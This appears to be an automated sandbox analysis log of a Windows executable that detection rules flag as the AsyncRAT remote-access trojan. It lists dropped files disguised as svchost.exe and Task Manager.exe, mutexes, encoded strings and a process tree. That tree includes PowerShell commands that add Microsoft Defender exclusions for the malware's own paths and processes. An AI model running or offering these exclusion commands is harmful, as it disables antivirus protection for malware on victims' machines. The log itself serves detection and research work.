Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: dLRcE11Dkl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: All function.cmd.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, 4EPW2fKcngj.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4EPW2fKcngj.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4EPW2fKcngj.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs Base64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Base64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs Base64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Base64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs Base64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Base64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
Source: Task Manager.exe.2.dr, vGttXPsprPl.cs Base64 encoded string: 'y1comeOV4gcc87An4AtwdvhYcApZCf8QLd5bCNLmn6NwVDAQWfG6GbDD4jh7', 'JJaW4XFEKF88MD0kGW2d6ydpLwqBSjD30uakRZ4XONOXHYkUnYCRcD97mBBq', 'GwyfZgm8QAlCedZUa69SEXqVs8M6QHaVTIqvfFjDing4h3wUiU9srSTRps2d'
Source: Task Manager.exe.2.dr, bFPtK0txY2P.cs Base64 encoded string: 'S6Ut6wXqTWGKPmYVDbRhtbIKt4li5XseFT5hk3d526rAPvn9714MonRl50Yd'
Source: Task Manager.exe.2.dr, xOmJpehc6ZQ.cs Base64 encoded string: 'vsf0wtmMulVosBnH4u06IVFDHBudEZaTPdJX4DdC1oqqduAbYynIh6gCDKFB', 'iq7PjIWqNsEKpzL5ScfzFN9WNTj14zXghPTa4XjUf7KoLNWu17Viiiu6xY6Q', 'IRXoCF167gUghTh2FAa2dO05m7gTomJB8hvb1B0HbxugFfCGDr1qEN56ZcbA', 'k7eZFAstrV1tvnJFNk86x5yM9kT8BlR2SugUgysZPt356Z3gU1eOy8MXXSA0', 'WOJhyYxZ6AxSkNEpFfacZReR6v23LtukQ7hd6tHAxTlmDuJgINTs1Nk72nKR', 'ucKsEbsHxvhmrQGfbKKnRX6ywaN9tZjvoCSg7U1v2FKiCCnbhbJfZI6UaaOV', 'YPCR7KHUqVe1lWbHxG96a2DxOsFeUDtRHPNARlEdzi6oUuiDotvQza5vRSCK', 'Xr10KugX1a6EwuKCGSE7XLmPeCSaVwGoFH7lvR60whwLshiBMgxvCFL25zJz', 'HAHdnvm8SYwxUn4jtY5XO3EdPNFOtm1upZu3MlNoAtYKHnwBVEj4VF85yUTQ', 'Ud8tUHYcT0o4OlFm8ieXRYuzah7cUA5lz8l5EXPpFrPWKAmvA1sfw2Esgg5p', 'lMcNrjewT3YjmP0WBxnmyoUAC64nQ46AbEv5GTAopwUrcODTZ7IH1y361A3Q', 'mF4APDflhqCjzXTdMvljZ2BAUIflbgqy4cn9OcWBd49WOZQVwDBBpoJWxKJ7'
Source: Task Manager.exe.2.dr, 2syffmJ1FUx.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Task Manager.exe.2.dr, 2syffmJ1FUx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@34/38@1/1
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File created: C:\Users\user\AppData\Roaming\All function.cmd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Mutant created: \Sessions\1\BaseNamedObjects\3ermCMaZELzglIX9h
Source: C:\Users\user\AppData\Roaming\All function.cmd Mutant created: \Sessions\1\BaseNamedObjects\6rWANPTakrMgPn7DP
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Mutant created: \Sessions\1\BaseNamedObjects\NvsfH1XO1syyGREn
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Users\user\AppData\Roaming\All function.exe Mutant created: \Sessions\1\BaseNamedObjects\prHEBzICljIZgj9Vw
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Mutant created: \Sessions\1\BaseNamedObjects\QGqDlUGtPZEL9zvP
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\d8q1JAoTE3NwBrSB
Source: C:\Users\user\AppData\Roaming\All function.exe File created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Jump to behavior
Source: dLRcE11Dkl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dLRcE11Dkl.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: dLRcE11Dkl.exe ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Users\user\Desktop\dLRcE11Dkl.exe "C:\Users\user\Desktop\dLRcE11Dkl.exe"
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd"
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd" Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
